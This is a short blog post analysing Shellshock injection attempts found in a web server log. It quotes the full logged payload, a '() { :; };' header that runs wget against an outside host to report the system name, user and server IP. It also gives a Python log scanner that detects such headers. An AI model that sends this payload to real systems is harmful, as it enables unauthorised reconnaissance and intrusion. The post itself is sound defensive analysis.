Monday, 11 May 2015

"Case study. Please bear with us. Thank you." Injection

Tonight several attempts have hit my system:

 46.151.212.26 - - [12/May/2015:01:31:28 +0200] "GET /cgi-bin/ HTTP/1.0" 408 519 "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`" "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`"

When executing the wget request (without the info), the returned file just says:

Case study. Please bear with us. Thank you.
The idea behind the several statements is quite simple:
if the injection worked, it would report to the page

  • uname - might be Linux
  • whoami - the user which owns/runs the shell
  • and the output of ifconfig.me - what is the IP of the server
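
To find such requests in an access log, the sketch below parses Apache combined-format lines, flags any request, referer or user-agent field that starts with the `() {` prefix seen above, and lists the callback host and the backtick commands whose output would have been reported. It is an added example, not part of the original post; the sample lines, the host `collector.example.invalid` and the IP addresses are constructed.

```python
import re
from urllib.parse import urlsplit

# One quoted field of Apache's combined log format (escaped quotes allowed).
Q = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + Q + r' (\d{3}) \S+ ' + Q + ' ' + Q + r'$'
)
FUNC_PREFIX = re.compile(r'\s*\(\)\s*\{')  # value starts like a bash function definition
BACKTICK = re.compile(r'`([^`]+)`')        # commands whose output would be reported
URL_RE = re.compile(r'https?://[^\s`]+')   # where the report would be sent

# Constructed sample lines (documentation IPs, placeholder host), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [12/May/2015:01:31:28 +0200] "GET /cgi-bin/ HTTP/1.0" 408 519 '
    '"() { :; }; /usr/bin/wget -qO - http://collector.example.invalid:404/gate.asp?info-`uname`-`whoami`" '
    '"() { :; }; /usr/bin/wget -qO - http://collector.example.invalid:404/gate.asp?info-`uname`-`whoami`"',
    '192.0.2.10 - - [12/May/2015:01:32:00 +0200] "GET /index.html HTTP/1.1" 200 1043 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
]


def scan(lines):
    """Return one finding per log field that starts with the '() {' prefix."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, when, request, status, referer, agent = m.groups()
        fields = (("request", request), ("referer", referer), ("user-agent", agent))
        for name, value in fields:
            if FUNC_PREFIX.match(value):
                urls = URL_RE.findall(value)
                findings.append({
                    "ip": ip, "time": when, "status": int(status), "field": name,
                    "callbacks": sorted({urlsplit(u).netloc for u in urls}),
                    "reported": BACKTICK.findall(value),
                })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```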